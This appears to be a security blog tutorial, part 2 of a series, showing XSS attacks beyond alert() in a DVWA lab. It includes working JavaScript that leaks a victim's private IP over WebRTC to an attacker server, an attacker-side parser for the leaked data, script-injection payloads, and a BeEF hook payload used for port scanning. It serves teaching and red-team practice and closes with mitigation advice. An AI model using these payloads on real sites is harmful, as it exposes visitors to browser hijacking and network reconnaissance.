Cross Site Scripting (XSS) beyond ‘alert()’ – Part 2

In the last post I showed that XSS is not all about 'alerting' the victim, but rather can be a serious attack on the victim that leverages the vulnerable website. This post has demos on how to enumerate the victim's private IP, ping sweep and port scan the victim's network, and finally how to use a browser exploitation framework such as BeEF.

For the demo, the victim machine (Ubuntu) is in NAT networking mode so that it has a private IP that differs from the addresses of the attacker machine (Kali) and the DVWA host, which are in bridged networking mode.

Victim Network Enumeration

XSS can be useful in network attacks as well, such as enumerating a victim that sits behind NAT or a firewall. Using WebRTC, I could grab the private IP of the victim. A huge credit for this approach goes to @natevw. In simple words, the script creates a peer connection with no STUN/TURN servers and a bogus data channel, which makes the browser gather ICE 'host' candidates; each candidate line carries a local interface address, and the script sends it to the attacker server by using it as the src of an 'image' object (the request shows up in the attacker's web server access log even though no image is returned). Caveat: current versions of the major browsers replace the address in host candidates with a random mDNS name ending in '.local' unless the page has been granted camera or microphone access, so on an up-to-date browser this technique leaks only that obfuscated name rather than the raw private IP. The following javascript is hosted on the Kali machine.

var PeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
// No STUN/TURN servers: only local "host" candidates are gathered, which is all we need.
var test_connect = new PeerConnection({ iceServers: [] });

// Fires once per gathered candidate and one last time with ice.candidate === null.
test_connect.onicecandidate = function (ice) {
  if (!ice.candidate) { return; } // end of gathering, nothing to send
  var img = new Image();
  // The candidate line contains spaces and ':' so encode it before placing it in the URL;
  // the GET request is recorded in the attacker's web server log.
  img.src = "http://192.168.1.105/connect_data=" + encodeURIComponent(ice.candidate.candidate);
};

// A data channel is needed so that the offer actually triggers ICE gathering.
test_connect.createDataChannel("");
test_connect.createOffer().then(function (sdp) {
  return test_connect.setLocalDescription(sdp);
}).catch(function () {});

Inject the code into DVWA using the payload
<script type="text/javascript" src=http://192.168.1.105/xss_research/webrtc_private_ip_xss.js></script>

When this infected page is visited by a user, their private IP address is leaked to the attacker's server (it appears as a GET request in the server's access log).
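What the attacker side does with the leaked data is left implicit above, so here is an added example (not from the original post, and not @natevw's code) of parsing the ICE 'candidate' strings received by the attacker's server. The candidate lines below are constructed for the example; they follow the standard ICE syntax (candidate:<foundation> <component> <transport> <priority> <address> <port> typ <type> ...). The parser pulls out private host addresses, notes server-reflexive (public) addresses, and counts candidates that an up-to-date browser has obfuscated with an mDNS '.local' name, which is the case where this technique no longer yields the private IP.

```javascript
// Added example: attacker-side parsing of leaked ICE candidate lines.
// Sample candidates are constructed for this example, not captured from a real victim.
const sampleCandidates = [
  "candidate:842163049 1 udp 2122260223 192.168.1.100 53711 typ host generation 0",
  "candidate:842163049 1 udp 2122260223 fd12:3456:789a::1 53711 typ host generation 0",
  "candidate:1467250027 1 udp 1845501695 203.0.113.7 53711 typ srflx raddr 192.168.1.100 rport 53711 generation 0",
  // What a modern browser emits instead of the LAN address: a random mDNS name.
  "candidate:3029352226 1 udp 2122260223 3b2c9a1e-0f6d-4c8a-9c3e-1a2b3c4d5e6f.local 54211 typ host generation 0",
];

// RFC 1918 IPv4 ranges and the IPv6 unique-local prefix (fc00::/7).
const PRIVATE_V4 = /^(10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.)/;
const PRIVATE_V6 = /^f[cd][0-9a-f]{2}:/i;

// Parse one candidate line into its interesting parts; returns null on anything malformed.
function parseCandidate(line) {
  const fields = line.replace(/^a=/, "").trim().split(" ");
  if (fields.length < 8 || !fields[0].startsWith("candidate:") || fields[6] !== "typ") {
    return null;
  }
  const address = fields[4];
  return {
    address,
    port: Number(fields[5]),
    type: fields[7],                       // host, srflx, prflx or relay
    mdns: address.endsWith(".local"),      // obfuscated host candidate
    privateV4: PRIVATE_V4.test(address),
    privateV6: PRIVATE_V6.test(address),
  };
}

// Summarise a batch of leaked lines the way the attacker's log processor would.
function summarize(lines) {
  const out = { privateAddresses: [], reflexive: [], obfuscated: 0 };
  for (const line of lines) {
    const c = parseCandidate(line);
    if (!c) continue;
    if (c.mdns) {
      out.obfuscated += 1;                 // browser hid the LAN address
    } else if (c.type === "host" && (c.privateV4 || c.privateV6)) {
      out.privateAddresses.push(c.address);
    } else if (c.type === "srflx") {
      out.reflexive.push(c.address);       // victim's public (NAT) address as seen by STUN
    }
  }
  return out;
}

console.log(summarize(sampleCandidates));
```

Run it with node; a batch where every host candidate is counted under obfuscated and none under privateAddresses tells you the victim's browser is masking host candidates and the leak has nothing useful in it.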

Appendix

This approach uses the WebRTC feature. If WebRTC is not enabled, there is another approach described in The Browser Hacker's Handbook (Chapter 10: Attacking Networks), which uses XMLHttpRequest to find the user's subnet based on the difference in response time between active and inactive hosts. Robert Hansen observed that the response of an XMLHttpRequest to an internal IP that is up is swift compared to one to a host that is not available. Do read about it. Using the same approach, there is also a method described to ping sweep the network, and using image objects and XMLHttpRequest one can achieve port scanning. All of these approaches and the needed resources are mentioned in the 'References' section. Because of modern browser restrictions such as port banning (browsers refuse to connect to a list of well-known non-HTTP ports, so a browser-based scan cannot reliably observe those ports), and because the extra technical detail does not fall within the scope of this post, I chose to skip them and leave them to the curiosity of the reader.

BeEF

It is a browser exploitation framework and is used extensively to ‘hook’ victim’s browser for malicious activities. This is usually achieved leveraging XSS vulnerability in websites.

Starting BeEF in Kali machine

Using the payload <script src="https://192.168.1.105:3000/hook.js"></script>, I trigger a stored XSS. (BeEF serves hook.js over plain HTTP unless HTTPS is enabled in its config.yaml, so the scheme in the payload must match your BeEF configuration.)

Now, when this page is visited by a victim, say with IP 192.168.1.100, an entry is shown in the BeEF admin panel, which can be accessed at http://127.0.0.1:3000/ui/panel on the attacker machine with username 'beef' and password 'beef' (these are the historical defaults; recent BeEF versions refuse to start until the default credentials are changed in config.yaml).

BeEF has various modules one can explore and have fun with. I'll show a demo of port scanning the victim.

Browsing Commands > Network > Port Scanner gives

Edit the options (target host and port range) and execute the module.

The result shows open ports 22 and 80. (Browsers ban connections to some well-known ports such as 22, so results for those ports depend on how the module interprets the immediate failure; confirm anything important with a real scanner from a foothold on the network.)

To detect if the victim is a virtual machine, use Commands > Host > Detect Virtual Machine

If you are a Red Teamer, knowing the XSS+BeEF approach is a must.

This was a sincere attempt to present the dangers that XSS poses. The best ways to mitigate XSS are input validation and, above all, context-aware output encoding (HTML body, attribute, JavaScript and URL contexts each need their own encoder); a Content Security Policy that restricts script-src would additionally have blocked both the remote webrtc script and the BeEF hook used in these demos. Lastly: never trust user input!! 🙂

References that say XSS is not about alert()

